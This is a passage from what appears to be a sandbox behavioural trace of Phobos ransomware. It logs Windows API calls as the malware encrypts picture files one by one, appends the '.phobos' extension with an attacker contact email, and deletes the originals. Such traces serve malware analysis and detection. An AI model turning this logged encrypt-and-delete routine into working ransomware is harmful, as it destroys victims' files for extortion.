Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.187] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.187] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.187] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.187] CloseHandle (hObject=0x140) returned 1 [0199.187] CloseHandle (hObject=0x174) returned 1 [0199.187] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\a0ufU.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\a0ufu.png")) returned 1 [0199.189] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\tPfoYySpv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\tpfoyyspv.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.190] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=87299) returned 1 [0199.190] CloseHandle (hObject=0x174) returned 1 [0199.190] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\tPfoYySpv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\tpfoyyspv.gif")) returned 0x20 [0199.190] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\tPfoYySpv.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\tpfoyyspv.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\tPfoYySpv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\tpfoyyspv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.190] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.190] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\tPfoYySpv.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\tpfoyyspv.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.191] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.191] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.191] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x15503, lpOverlapped=0x0) returned 1 [0199.192] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15510, dwBufLen=0x15510 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15510) returned 1 [0199.193] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x15510, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x15510, lpOverlapped=0x0) returned 1 [0199.195] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0199.195] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.195] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.195] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.195] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.195] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.195] CloseHandle (hObject=0x174) returned 1 [0199.195] CloseHandle (hObject=0x140) returned 1 [0199.195] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\tPfoYySpv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\tpfoyyspv.gif")) returned 1 [0199.197] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\UNHUgpf_3pl-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\unhugpf_3pl-.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.198] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=28770) returned 1 [0199.198] CloseHandle (hObject=0x140) returned 1 [0199.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\UNHUgpf_3pl-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\unhugpf_3pl-.gif")) returned 0x20 [0199.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\UNHUgpf_3pl-.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\unhugpf_3pl-.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\UNHUgpf_3pl-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\unhugpf_3pl-.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.198] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.198] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\UNHUgpf_3pl-.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\unhugpf_3pl-.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.199] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.199] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7062, lpOverlapped=0x0) returned 1 [0199.201] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7070, dwBufLen=0x7070 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7070) returned 1 [0199.201] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7070, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7070, lpOverlapped=0x0) returned 1 [0199.203] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0199.203] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.203] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0199.203] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.203] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0199.203] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.203] CloseHandle (hObject=0x140) returned 1 [0199.203] CloseHandle (hObject=0x174) returned 1 [0199.203] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\UNHUgpf_3pl-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\unhugpf_3pl-.gif")) returned 1 [0199.204] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\zUniIF-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\zuniif-.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.205] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=100225) returned 1 [0199.205] CloseHandle (hObject=0x174) returned 1 [0199.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\zUniIF-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\zuniif-.jpg")) returned 0x20 [0199.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\zUniIF-.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\zuniif-.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\zUniIF-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\zuniif-.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.205] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.206] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\zUniIF-.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\zuniif-.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.206] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.206] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18781, lpOverlapped=0x0) returned 1 [0199.208] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18790, dwBufLen=0x18790 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18790) returned 1 [0199.209] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x18790, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x18790, lpOverlapped=0x0) returned 1 [0199.211] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0199.211] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.211] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.211] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.211] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.211] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.211] CloseHandle (hObject=0x174) returned 1 [0199.211] CloseHandle (hObject=0x140) returned 1 [0199.211] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\zUniIF-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\zuniif-.jpg")) returned 1 [0199.212] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TFZ W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tfz w.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.213] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=65698) returned 1 [0199.213] CloseHandle (hObject=0x140) returned 1 [0199.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TFZ W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tfz w.bmp")) returned 0x20 [0199.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TFZ W.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tfz w.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TFZ W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tfz w.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.213] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.213] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TFZ W.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tfz w.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.214] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.214] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.214] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x100a2, lpOverlapped=0x0) returned 1 [0199.219] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100b0, dwBufLen=0x100b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100b0) returned 1 [0199.220] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100b0, lpOverlapped=0x0) returned 1 [0199.221] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0199.221] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.221] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.221] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.221] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.222] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.222] CloseHandle (hObject=0x140) returned 1 [0199.222] CloseHandle (hObject=0x174) returned 1 [0199.222] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TFZ W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tfz w.bmp")) returned 1 [0199.223] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WdB1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wdb1.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.223] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=75271) returned 1 [0199.223] CloseHandle (hObject=0x174) returned 1 [0199.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WdB1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wdb1.png")) returned 0x20 [0199.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WdB1.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wdb1.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WdB1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wdb1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.224] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.224] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WdB1.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wdb1.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.224] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.224] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.224] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x12607, lpOverlapped=0x0) returned 1 [0199.347] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12610, dwBufLen=0x12610 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12610) returned 1 [0199.348] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x12610, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x12610, lpOverlapped=0x0) returned 1 [0199.350] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0199.350] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.350] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.350] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.350] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.350] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.350] CloseHandle (hObject=0x174) returned 1 [0199.350] CloseHandle (hObject=0x140) returned 1 [0199.350] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WdB1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wdb1.png")) returned 1 [0199.352] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6c2UZa.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6c2uza.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.424] GetFileSizeEx 